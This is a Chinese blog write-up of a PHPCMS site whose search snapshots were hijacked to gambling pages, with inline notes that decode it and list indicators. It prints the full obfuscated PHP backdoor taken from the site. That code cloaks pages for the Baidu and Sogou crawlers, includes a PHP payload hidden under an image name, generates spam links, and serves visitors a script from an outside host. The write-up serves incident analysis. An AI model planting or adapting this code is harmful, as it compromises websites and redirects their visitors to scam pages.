
PHPCMS 全站快照被劫持 劫持代码与脚本后门

PHPCMS 全站快照被劫持
index.php?m=content&c=index&a=lists&catid=84 是 PHPCMS 内容页的正常后缀;被劫持后,全变成了 index.php??fid=122594255023/
点进去变成了菠菜页面。劫持代码如下:

error_reporting(0);date_default_timezone_set(‘Asia/Shanghai’);
// NOTE(review): captured malicious sample, reproduced exactly as published. The page rendering
// replaced ASCII quotes with typographic ones, so the listing is not valid PHP as shown.
// IP prefixes (first three octets) handed to IsRebots() as $ip_list: a client whose REMOTE_ADDR
// contains one of them is excluded from all hijack behaviour.
$S9 = explode(“|”,”124.42.74|101.40.0|221.217.53″);
// True when the request looks like one of the injected spam URLs rather than a normal PHPCMS URL:
// id/tid/aid/nid above 1000000; fid/gid/catid/xuh above 10000; mid, av or moc present and truthy;
// or a query string containing "/" that also contains "htm" or is numeric once "/" is trimmed.
// The article's normal URL (catid=84) does not satisfy any of these conditions.
$S22 = (trim($_GET[‘id’],’/’) > 1000000 || trim($_GET[‘tid’],’/’) > 1000000 || $_GET[‘aid’] > 1000000 || trim($_GET[‘nid’],’/’) > 1000000 || (stristr($_SERVER[‘QUERY_STRING’],’/’) && (stristr($_SERVER[‘QUERY_STRING’],’htm’) or is_numeric(trim($_SERVER[‘QUERY_STRING’],’/’)))) || trim($_GET[‘fid’],’/’) > 10000 || $_GET[‘mid’] || $_GET[‘av’] || $_GET[‘moc’] || trim($_GET[‘gid’],’/’) > 10000 || $_GET[‘catid’] > 10000 || $_GET[‘xuh’] > 10000);
// rndStr($length = 7): returns $length characters picked with rand() from a-z and 0-9.
// In this listing it is only called by PostLinks(), to build random-looking path segments.
function rndStr($length=7){ $str = null; $strPol = “abcdefghijklmnopqrstuvwxyz0123456789″; $max = strlen($strPol)-1; for($i=0;$i<$length;$i++){ $str.=$strPol[rand(0,$max)]; } return $str; }
// PostLinks(): builds the URL templates that the main logic prints as links for matching crawlers.
// Returns the templates joined with "|" and base64-encoded. "(min,max)" inside a template is a
// placeholder; the caller replaces each one with a random number in that range.
function PostLinks(){
$S27 = array();
// Path on the current host under /news/<Ymd>/<Hi>/index.html - the same path SaveF() writes to.
$S27[]= ‘http://’.$_SERVER[‘HTTP_HOST’].’/news/’.date(‘Ymd’).’/’.date(‘Hi’).’/index.html’;
// The four base64 literals below all decode to URLs under http://www.dtxs.cn/index.php
// (a random "<5-6 chars>/<5 chars>.html" suffix, a content/show URL with catid and id
// placeholders, a bare numeric placeholder, and a moc= placeholder).
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD8=’).rndStr(rand(5,6)).’/’.rndStr(rand(5,5)).’.html’;
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD9tPWNvbnRlbnQmYz1pbmRleCZhPXNob3cmY2F0aWQ9KDEsOTk5KSZpZD0oMSw5OTk5OTk5OTk5OTkp’);
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD8oMSw5OTk5OTk5OTk5OTkp’);
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD9tb2M9KDEsOTk5OTk5OTk5OTk5KS8=’);
// Templates on the current host using the fid/gid/nid/mid parameters that $S22 tests for.
// Several entries are exact repeats, so those patterns are emitted more often.
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?fid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?nid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?fid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?a=show&c=index&catid=(1,999)&id=(1,999999999999)’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?nid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?fid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
return base64_encode(implode(‘|’, $S27));
// The closing brace of PostLinks() shares its line with a define(): APP_JACK_DOCUMENTROOT is
// DOCUMENT_ROOT plus the hex-decoded string "/uploadfile/2016/0512/", the directory the payload
// file is include()d from further down. A file there that contains PHP is an indicator to check.
}define(‘APP_JACK_DOCUMENTROOT’,$_SERVER[‘DOCUMENT_ROOT’].PACK(‘H*’,’2F75706C6F616466696C652F323031362F303531322F’));
// SaveF($Js, $Data): caches generated output as DOCUMENT_ROOT/news/<Ymd>/<Hi>/index.html
// (content is $Js . $Data) and chmods the file to 0444. When the directory is missing, the call
// only creates it (mode 0777, recursive); the file is written by a later call within that minute.
//
// De-obfuscation notes for the statements after SaveF. Bare words are undefined constants,
// which older PHP versions evaluate as strings:
//   $S1 = strtr, $S2 = strrev, $S3 = str_rot13, $S4 = base64_decode,
//   $S5 = create_function (assigned but not called in this listing).
//   Most literals are decoded as base64_decode(str_rot13(strrev(literal))).
//   $S7  = lower-cased $_SERVER['HTTP_USER_AGENT'], $S8 = lower-cased $_SERVER['HTTP_REFERER'],
//   $S29 = $_SERVER['HTTP_HOST'], $S30 = $_SERVER['REQUEST_URI'] (both unused below).
//   $S10 = user-agent substrings; the two compared explicitly decode to "baidu" and "sogou",
//          so the rest are presumably other crawler names (not decoded here).
//   $S12 = referer keywords; the entries decoded for this note are "bwin" and "888",
//          the remainder look like URL-encoded terms (not decoded here).
//   $S20 = "|"-separated referer substrings - presumably search-engine names; not decoded here.
//   $S26 = plain base64 of a <script> tag that loads
//          //www.ptwys.com/ho.aspx?id=70555995&logo=12 (the redirect shown to human visitors).
//   $S14 and $S18 are assigned but not used in this listing.
//
// IsRebots($ip_list, $ref): despite the name, returns true when the hijack should run.
//   Returns false and sets cookie "sess_domains" when REMOTE_ADDR contains an $ip_list prefix,
//   or when the referer contains "inurl:", "site:", "site%3" or "inurl%3" (a search using those
//   operators); returns false when that cookie is already present. Such visitors get the clean site.
//
// Main flow when IsRebots() is true:
//   1. User agent contains a $S10 token:
//      - token is baidu/sogou and $S22 is true: include() APP_JACK_DOCUMENTROOT . "1.jpg"
//        (PHP stored under an image name); for sogou the site's own home page is appended;
//        the result is cached via SaveF() and sent with exit().
//      - token is baidu/sogou and $S22 is false: prints <a href="..."></a> links built from
//        PostLinks(), replacing each "(min,max)" placeholder (regex /\((.*)\)/isU) with rand().
//      - any other token: include() the same file, SaveF(), exit().
//   2. Referer contains a $S20 token: exit($S26) when $S22 is true, or when the referer also
//      contains a $S12 keyword.
//
// Indicators visible in this sample: /uploadfile/2016/0512/1.jpg, read-only index.html files
// under /news/<Ymd>/<Hi>/, the "sess_domains" cookie, and the www.ptwys.com script reference.
function SaveF($Js,$Data){$Dir=$_SERVER[‘DOCUMENT_ROOT’].’/news/’.date(‘Ymd’).’/’.date(‘Hi’).’/’;$File=$Dir.’index.html’;if(!file_exists($File)){if(!file_exists($Dir)){@mkdir($Dir,0777,true);}else{$Open=fopen($File,’w’);fwrite($Open,$Js.$Data);fclose($Open);chmod($File,0444);}}}$S = t . r;$S1 = S . $S . $S;$S2 = S . $S . re . v;$S3 = $S1(S . $S . prot1a, pa, _3);$S4 = $S3($S2($S1(robpr . Q_06 . rfnO, o0, q4)));$S5 = $S4($S3($S2($S1(hiJnO . Azo1MO . K0EK . L0W3D, $S4(T2kw), $S4(MDl5)))));$S7 = strtolower($_SERVER[$S4($S3($S2($S1(H5HEUS . OKFIOHI9 . SHHESF, O, 0))))]);$S8 = strtolower($_SERVER[$S4($S3($S1(FSELLSOFELMSLxIF, LO, H9)))]);$S29 = $_SERVER[$S4($S3($S2(HA1GV9S . HHESF)))];$S30 = $_SERVER[$S4($S3($S2(‘=xxHI9SIGIHIEIxH’)))];$S10=Array($S4($S3($S2(‘=VKMxyTpmIUMcSzL’))),$S4($S3($S2(‘==NqiW2MhyzL’))),$S4($S3($S2(‘==tpyEJnjA3om92p’))),$S4($S3($S2(‘=H3oa92p’))),$S4($S3($S2(lITM . cO3pjLmZ))),$S4($S3($S2(lITM . cO3p192p . iSTn))),$S4($S3($S2(‘=’.’VKMxyTpmI3omyJr’))));$S12=Array($S4($S3($S2(‘==tocqaL’))),$S4($S3($S2(‘==tocWzL’))),$S4($S3($S2(‘==DLzSTM’))),$S4($S3($S2(‘4tQB’))),$S4($S3($S2(‘0IzL’))),$S4($S3($S2(wuGW1VJW4HJW))),$S4($S3($S2(uyGWxuGW1HJW))),$S4($S3($S2(mtGWjxGW3HHW))),$S4($S3($S2(jxGW5VJW0HJWkVJW4RJW1HJW))),$S4($S3($S2(uWJWuWJW0HJWzyGWwyGW3HJW))),$S4($S3($S2(‘3VJW4tGW2HJWjtGWwWJW1HJW’))),$S4($S3($S2(‘4RJW3xGW5HJWmVJWyWJW2HJW’))),$S4($S3($S2(wuGW5tGW3HJWvuGWmRJW2HJW))),$S4($S3($S2(zSJWySJW4HJW4RJW1tGW1HJW))),$S4($S3($S2(kxGW3tGW5HJW5RJWxWJW1HJW))),$S4($S3($S2(‘4RJW0xGW3HJW3tGW0RJW1HJW’))),$S4($S3($S2(kxGW3tGW5HJWjVJWyuGW3HJW))),$S4($S3($S2(‘2VJWySJW1HJWyWJW5xGW3HJW’))),$S4($S3($S2(‘2tGW4tGW1HJW0xGWzSJW2HJW’))),$S4($S3($S2(uuGW4VJW0HJWzWJWuWJW3HJW))),$S4($S3($S2(jRJW2tGW1HJW3tGWuyGW3HJW))),$S4($S3($S2(kVJWuuGW4HJWkxGW3tGW5HJW))),$S4($S3($S2(xyGW5VJW0HJWwuGW5tGW3HJW))),$S4($S3($S2(zuGW4tGW2HJW4VJW4VJW2HJW))),$S4($S3($S2(wWJWkVJW5HJW1xGWxuGW2HJW))),$S4($S3($S2(jVJWzuGW1HJWmVJW5VJW1HJW))),$S4($S3($S2(yuGW5xGW4HJW5xGWyWJW5HJW))),$S4($S3($S2(‘5RJWxWJW1HJW2VJW3x
GW2HJW’))),$S4($S3($S2(‘5tGWuSJW4HJWkRJWzWJW0HJW’))),$S4($S3($S2(‘4RJW1RJW3HJW5RJWxWJW1HJW’))),$S4($S3($S2(‘4RJWmVJW2HJW1xGWuuGW2HJW’))),$S4($S3($S2(‘4RJWmVJW2HJWvuGW4VJW0HJW’))),$S4($S3($S2(kVJWlxGW5HJWzyGWwyGW3HJW))),$S4($S3($S2(‘1tGW5xGW5HJWxWJWvyGW1HJW’))),$S4($S3($S2(jVJWyuGW3HJWjxGWzuGW2HJW))),$S4($S3($S2(mVJW4xGW5HJWuSJW0RJW1HJW))));$S26=$S4(‘PHNjcmlwdCBzcmM9Ii8vd3d3LnB0d3lzLmNvbS9oby5hc3B4P2lkPTcwNTU1OTk1JmxvZ289MTIiIGxhbmd1YWdlPSJKYXZhU2NyaXB0Ij48L3NjcmlwdD4=’);$S14 = $S4($S3($S2(‘==’.’jYa9To’)));$S18 = Array($S4($S3($S2(iNKo09vpuM3Y))),$S4($S3($S2(‘=8PpgE3Y’))),$S4($S3($S2(‘==’.’jYj1JMH9lp39TMhy2IibmD’))));$S20 = explode($S4($S3($S2(‘==Ns’))),$S4($S3($S2(hAzYgAaY812ow5lom . kaYiA3omkaY192Mi . AUshHUMcSzL85lMhyzL85FqiA3ou . uTsh82piSTn))));function IsRebots($ip_list,$ref) {$ip=$_SERVER[‘REMOTE_ADDR’];foreach($ip_list as $iplist){if (@stristr($ip,$iplist)){setcookie(base64_decode(c2Vzc19k . b21haW5z),”1”);return false;}}$http_ref=explode(“|”,base64_decode(aW51cmw6fHNpdGU6fHNpdGUlM3xpbnVybCUz));foreach($http_ref as $r){if(stristr($ref,$r)){setcookie(base64_decode(c2Vzc19k . b21haW5z),”1″);return false;}}if(isset($_COOKIE[base64_decode(c2Vzc19k . b21haW5z)])){return false;}return true;}if (IsRebots($S9,$S8)){foreach($S10 as $S11){if(stristr($S7, $S11)){if(stristr($S11,$S4($S3($S2(‘=HUMcSzL’)))) || stristr($S11,$S4($S3($S2(‘=H3oa92p’))))) {if($S22){$currentPage = include (APP_JACK_DOCUMENTROOT . $S4($S3($S2(“=pTpd5FZ”))));if(stristr($S7, $S4($S3($S2(‘=H3oa92p’))))){$http_type = ((isset($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] == ‘on’) || (isset($_SERVER[‘HTTP_X_FORWARDED_PROTO’]) && $_SERVER[‘HTTP_X_FORWARDED_PROTO’] == ‘https’)) ? 
‘https://’ : ‘http://’;$currentPage=$currentPage.implode(”,@file($http_type.$_SERVER[‘HTTP_HOST’]));}@SaveF($S26, $currentPage);exit($currentPage);}else{$linkarr=explode($S4($S3($S2(‘==Ns’))),base64_decode(PostLinks()));for($a=0;$a<rand(1,2);$a++){foreach($linkarr as $vv){preg_match_all($S4($S3($S2(‘==DImy2YcjIXd4PXbj1Y’))),$vv,$url);foreach($url[1] as $a=>$v){$dl=explode(“,”,$v);$num=rand($dl[0],$dl[1]);$vv=str_replace($url[0][$a],$num,$vv);}echo($S4($S3($S2(v0wMyWUntRTC))).$vv.$S4($S3($S2(‘=4wV’))).$S4($S3($S2(‘==tCu9PC’))));}}}}else{$currentPage = include(APP_JACK_DOCUMENTROOT.$S4($S3($S2(“=pTpd5FZ”))));@SaveF($S26,$currentPage);exit($currentPage);}}}foreach($S20 as $S21){if(stristr($S8, $S21)){if($S22){exit($S26);}else{foreach($S12 as $S13){if(stristr($S8, $S13)){exit($S26);}}}}}}

版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《PHPCMS 全站快照被劫持 劫持代码与脚本后门》
文章链接:https://www.lolmm.cn/wzcgal/199.html